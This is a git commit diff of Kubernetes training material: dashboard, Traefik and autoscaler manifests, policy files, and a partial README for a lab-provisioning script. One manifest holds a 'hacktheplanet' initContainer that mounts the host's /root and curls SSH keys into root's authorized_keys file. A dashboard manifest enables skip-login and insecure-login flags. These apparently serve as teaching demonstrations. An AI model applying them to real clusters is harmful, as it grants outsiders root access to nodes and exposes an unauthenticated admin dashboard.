Compare commits

1 commit

Author: Jérôme Petazzoni
SHA1: ea3178327a
Message: Prepare content for Thoughtworks Infrastructure
Date: 2022-08-17 14:51:57 +02:00

383 changed files with 6899 additions and 15018 deletions

===== .gitignore (vendored) =====

@@ -2,14 +2,11 @@
*.swp
*~
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/www
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
prepare-tf/tag-*
slides/*.yml.html
slides/autopilot/state.yaml
@@ -29,4 +26,3 @@ node_modules
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

===== next file =====

@@ -1,6 +1,6 @@
 FROM ruby:alpine
 RUN apk add --update build-base curl
-RUN gem install sinatra --version '~> 3'
+RUN gem install sinatra
 RUN gem install thin
 ADD hasher.rb /
 CMD ["ruby", "hasher.rb"]

===== next file =====

@@ -17,8 +17,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
@@ -30,8 +30,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
@@ -43,8 +43,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
@@ -56,8 +56,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
@@ -71,8 +71,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
@@ -84,8 +84,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
@@ -106,8 +106,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
@@ -182,8 +182,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
@@ -204,8 +204,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
@@ -253,8 +253,8 @@ spec:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
spec:
containers:
- args:
@@ -262,7 +262,7 @@ spec:
- --sidecar-host=http://127.0.0.1:8000
- --enable-skip-login
- --enable-insecure-login
-        image: kubernetesui/dashboard:v2.7.0
+        image: kubernetesui/dashboard:v2.5.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -293,7 +293,7 @@ spec:
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
-      - image: kubernetesui/metrics-scraper:v1.0.8
+      - image: kubernetesui/metrics-scraper:v1.0.7
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:

===== next file =====

@@ -17,8 +17,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
@@ -30,8 +30,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
@@ -43,8 +43,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
@@ -56,8 +56,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
@@ -71,8 +71,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
@@ -84,8 +84,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
@@ -106,8 +106,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
@@ -182,8 +182,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
@@ -204,8 +204,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
@@ -253,15 +253,15 @@ spec:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
-        image: kubernetesui/dashboard:v2.7.0
+        image: kubernetesui/dashboard:v2.5.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -292,7 +292,7 @@ spec:
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
-      - image: kubernetesui/metrics-scraper:v1.0.8
+      - image: kubernetesui/metrics-scraper:v1.0.7
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:

===== next file =====

@@ -17,8 +17,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
@@ -30,8 +30,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
@@ -43,8 +43,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
@@ -56,8 +56,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
@@ -71,8 +71,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
@@ -84,8 +84,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
@@ -106,8 +106,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
@@ -182,8 +182,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
@@ -204,8 +204,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
@@ -253,15 +253,15 @@ spec:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.7.0
-    helm.sh/chart: kubernetes-dashboard-6.0.0
+    app.kubernetes.io/version: 2.5.0
+    helm.sh/chart: kubernetes-dashboard-5.2.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
-        image: kubernetesui/dashboard:v2.7.0
+        image: kubernetesui/dashboard:v2.5.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -292,7 +292,7 @@ spec:
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
-      - image: kubernetesui/metrics-scraper:v1.0.8
+      - image: kubernetesui/metrics-scraper:v1.0.7
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -344,12 +344,3 @@ metadata:
   creationTimestamp: null
   name: cluster-admin
   namespace: kubernetes-dashboard
----
-apiVersion: v1
-kind: Secret
-type: kubernetes.io/service-account-token
-metadata:
-  name: cluster-admin-token
-  namespace: kubernetes-dashboard
-  annotations:
-    kubernetes.io/service-account.name: cluster-admin

===== next file =====

@@ -16,7 +16,8 @@ spec:
       hostPath:
         path: /root
     tolerations:
-    - operator: Exists
+    - effect: NoSchedule
+      operator: Exists
     initContainers:
     - name: hacktheplanet
       image: alpine
@@ -26,7 +27,7 @@ spec:
       command:
       - sh
       - -c
-      - "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
+      - "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
     containers:
     - name: web
       image: nginx

===== next file =====

@@ -1,5 +1,5 @@
 kind: HorizontalPodAutoscaler
-apiVersion: autoscaling/v2
+apiVersion: autoscaling/v2beta2
 metadata:
   name: rng
 spec:

===== next file =====

@@ -15,10 +15,10 @@ spec:
       - key: "{{ request.operation }}"
         operator: Equals
         value: UPDATE
-      - key: "{{ request.oldObject.metadata.labels.color || '' }}"
+      - key: "{{ request.oldObject.metadata.labels.color }}"
         operator: NotEquals
         value: ""
-      - key: "{{ request.object.metadata.labels.color || '' }}"
+      - key: "{{ request.object.metadata.labels.color }}"
         operator: NotEquals
         value: ""
     validate:

===== next file =====

@@ -15,10 +15,10 @@ spec:
       - key: "{{ request.operation }}"
         operator: Equals
         value: UPDATE
-      - key: "{{ request.oldObject.metadata.labels.color || '' }}"
+      - key: "{{ request.oldObject.metadata.labels.color }}"
         operator: NotEquals
         value: ""
-      - key: "{{ request.object.metadata.labels.color || '' }}"
+      - key: "{{ request.object.metadata.labels.color }}"
         operator: Equals
         value: ""
     validate:

===== next file =====

@@ -1,13 +0,0 @@
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
name: my-pdb
spec:
#minAvailable: 2
#minAvailable: 90%
maxUnavailable: 1
#maxUnavailable: 10%
selector:
matchLabels:
app: my-app

===== next file =====

@@ -1,27 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: sysctl
spec:
selector:
matchLabels:
app: sysctl
template:
metadata:
labels:
app: sysctl
spec:
tolerations:
- operator: Exists
initContainers:
- name: sysctl
image: alpine
securityContext:
privileged: true
command:
- sysctl
- fs.inotify.max_user_instances=99999
containers:
- name: pause
image: registry.k8s.io/pause:3.8

===== next file =====

@@ -1,44 +1,36 @@
 ---
-apiVersion: v1
-kind: Namespace
-metadata:
-  name: traefik
----
 apiVersion: v1
 kind: ServiceAccount
 metadata:
-  name: traefik
-  namespace: traefik
+  name: traefik-ingress-controller
+  namespace: kube-system
 ---
 kind: DaemonSet
 apiVersion: apps/v1
 metadata:
-  name: traefik
-  namespace: traefik
+  name: traefik-ingress-controller
+  namespace: kube-system
   labels:
-    app: traefik
+    k8s-app: traefik-ingress-lb
 spec:
   selector:
     matchLabels:
-      app: traefik
+      k8s-app: traefik-ingress-lb
   template:
     metadata:
       labels:
-        app: traefik
-        name: traefik
+        k8s-app: traefik-ingress-lb
+        name: traefik-ingress-lb
     spec:
       tolerations:
       - effect: NoSchedule
         operator: Exists
-      # If, for some reason, our CNI plugin doesn't support hostPort,
-      # we can enable hostNetwork instead. That should work everywhere
-      # but it doesn't provide the same isolation.
-      #hostNetwork: true
-      serviceAccountName: traefik
+      hostNetwork: true
+      serviceAccountName: traefik-ingress-controller
       terminationGracePeriodSeconds: 60
       containers:
-      - image: traefik:v2.10
-        name: traefik
+      - image: traefik:v2.5
+        name: traefik-ingress-lb
         ports:
         - name: http
           containerPort: 80
@@ -69,7 +61,7 @@ spec:
 kind: ClusterRole
 apiVersion: rbac.authorization.k8s.io/v1
 metadata:
-  name: traefik
+  name: traefik-ingress-controller
 rules:
   - apiGroups:
     - ""
@@ -81,6 +73,14 @@ rules:
     - get
     - list
     - watch
+  - apiGroups:
+    - extensions
+    resources:
+    - ingresses
+    verbs:
+    - get
+    - list
+    - watch
   - apiGroups:
     - networking.k8s.io
     resources:
@@ -94,15 +94,15 @@ rules:
 kind: ClusterRoleBinding
 apiVersion: rbac.authorization.k8s.io/v1
 metadata:
-  name: traefik
+  name: traefik-ingress-controller
 roleRef:
   apiGroup: rbac.authorization.k8s.io
   kind: ClusterRole
-  name: traefik
+  name: traefik-ingress-controller
 subjects:
 - kind: ServiceAccount
-  name: traefik
-  namespace: traefik
+  name: traefik-ingress-controller
+  namespace: kube-system
 ---
 kind: IngressClass
 apiVersion: networking.k8s.io/v1

===== next file =====

@@ -70,15 +70,4 @@ add_namespace() {
   kubectl create serviceaccount -n kubernetes-dashboard cluster-admin \
           -o yaml --dry-run=client \
           #
-  echo ---
-  cat <<EOF
-apiVersion: v1
-kind: Secret
-type: kubernetes.io/service-account-token
-metadata:
-  name: cluster-admin-token
-  namespace: kubernetes-dashboard
-  annotations:
-    kubernetes.io/service-account.name: cluster-admin
-EOF
 ) > dashboard-with-token.yaml

===== next file =====

@@ -1,222 +0,0 @@
# Tools to create lab environments
This directory contains tools to create lab environments for Docker and Kubernetes courses and workshops.
It also contains Terraform configurations that can be used stand-alone to create simple Kubernetes clusters.
Assuming that you have installed all the necessary dependencies, and placed cloud provider access tokens in the right locations, you could do, for instance:
```bash
# For a Docker course with 50 students,
# create 50 VMs on Digital Ocean.
./labctl create --students 50 --settings settings/docker.env --provider digitalocean
# For a Kubernetes training with 20 students,
# create 20 clusters of 4 VMs each using kubeadm,
# on a private OpenStack cluster.
./labctl create --students 20 --settings settings/kubernetes.env --provider openstack/enix
# For a Kubernetes workshop with 80 students,
# create 80 clusters with 2 VMs each,
# using Scaleway Kapsule (managed Kubernetes).
./labctl create --students 80 --settings settings/mk8s.env --provider scaleway --mode mk8s
```
Interested? Read on!
## Software requirements
For Docker labs and Kubernetes labs based on kubeadm:
- [Parallel SSH](https://github.com/lilydjwg/pssh)
(should be installable with `pip install git+https://github.com/lilydjwg/pssh`;
on a Mac, try `brew install pssh`)
For all labs:
- Terraform
If you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)
These require Python 3. If you are on a Mac, see below for specific instructions on setting up Python 3 as the default Python. In particular, if you installed `mosh`, Homebrew may have changed your default Python to Python 2.
You will also need an account with the cloud provider(s) that you want to use to deploy the lab environments.
## Cloud provider account(s) and credentials
These scripts create VMs or Kubernetes clusters on cloud providers, so you will need cloud provider account(s) and credentials.
Generally, we try to use the credentials stored in the configuration files used by the cloud providers' CLI tools.
This means, for instance, that for Linode, if you install `linode-cli` and configure it properly, it will place your credentials in `~/.config/linode-cli`, and our Terraform configurations will try to read that file and use the credentials in it.
You don't **have to** install the CLI tools of the cloud provider(s) that you want to use, but we recommend that you do.
If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.
Here is where we look for credentials for each provider:
- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
- Civo: CLI configuration file (`~/.civo.json`)
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
- Google Cloud: FIXME, note that the project name is currently hard-coded to `prepare-tf`
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
- Linode: CLI configuration file (`~/.config/linode-cli`)
- OpenStack: you will need to write a tfvars file (check [that example](terraform/virtual-machines/openstack/tfvars.example))
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)
[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
## General Workflow
- fork/clone repo
- make sure your cloud credentials have been configured properly
- run `./labctl create ...` to create lab environments
- run `./labctl destroy ...` when you don't need the environments anymore
## Customizing things
You can edit the `settings/*.env` files, for instance to change the size of the clusters, the login or password used for the students...
Note that these files are sourced before executing any operation on a specific set of lab environments, which means that you can set Terraform variables by adding lines like the following to the `*.env` files:
```bash
export TF_VAR_node_size=GP1.L
export TF_VAR_location=eu-north
```
## `./labctl` Usage
If you run `./labctl` without arguments, it will show a list of available commands.
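For example, a typical session could look like this (a minimal sketch: the tag is an arbitrary label, and the `destroy` invocation assumes that it accepts the same `--tag` option as `create`):
```bash
# Create a batch of lab environments and give them a memorable tag.
./labctl create \
  --tag 2022-08-17-demo \
  --provider digitalocean \
  --settings settings/docker.env \
  --students 10
# Later, tear down everything associated with that tag.
./labctl destroy --tag 2022-08-17-demo
```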
### Summary of What `./labctl` Does For You
The script will create a Terraform configuration using a provider-specific template.
There are two modes: `pssh` and `mk8s`.
In `pssh` mode, students connect directly to the virtual machines using SSH.
The Terraform configuration creates a bunch of virtual machines, then the provisioning and configuration are done with `pssh`. A series of "steps" is executed on the VMs to install Docker, install various convenient tools, install and set up Kubernetes (if needed), and so on. The list of steps to execute is configured in the `settings/*.env` file, as sketched below.
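Here is a minimal sketch of such a settings file, modeled on the `settings/*.env` files that appear further down in this diff (the inline comments are interpretation, not documentation):
```bash
CLUSTERSIZE=3        # presumably the number of VMs per lab environment
CLUSTERPREFIX=test   # presumably the hostname prefix for the VMs
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"
```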
In `mk8s` mode, students don't connect directly to the virtual machines. Instead, they connect to an SSH server running in a Pod (using the `jpetazzo/shpod` image), itself running on a managed Kubernetes cluster created by the Terraform configuration.
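From the student's perspective, this still looks like a plain SSH connection; the printable cards (see the template further down) carry a login, a password, an IP address, and a port. A hypothetical connection, with placeholder values:
```bash
ssh -p 32222 k8s@203.0.113.10
```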
## `terraform` directory structure and principles
Legend:
- `📁` directory
- `📄` file
- `📄📄📄` multiple files
- `🌍` Terraform configuration that can be used "as-is"
```
📁terraform
├── 📁list-locations
│ └── 📄📄📄 helper scripts
│ (to list available locations for each provider)
├── 📁many-kubernetes
│ └── 📄📄📄 Terraform configuration template
│ (used in mk8s mode)
├── 📁one-kubernetes
│ │ (contains Terraform configurations that can spawn
│ │ a single Kubernetes cluster on a given provider)
│ ├── 📁🌍aws
│ ├── 📁🌍civo
│ ├── 📄common.tf
│ ├── 📁🌍digitalocean
│ └── ...
├── 📁providers
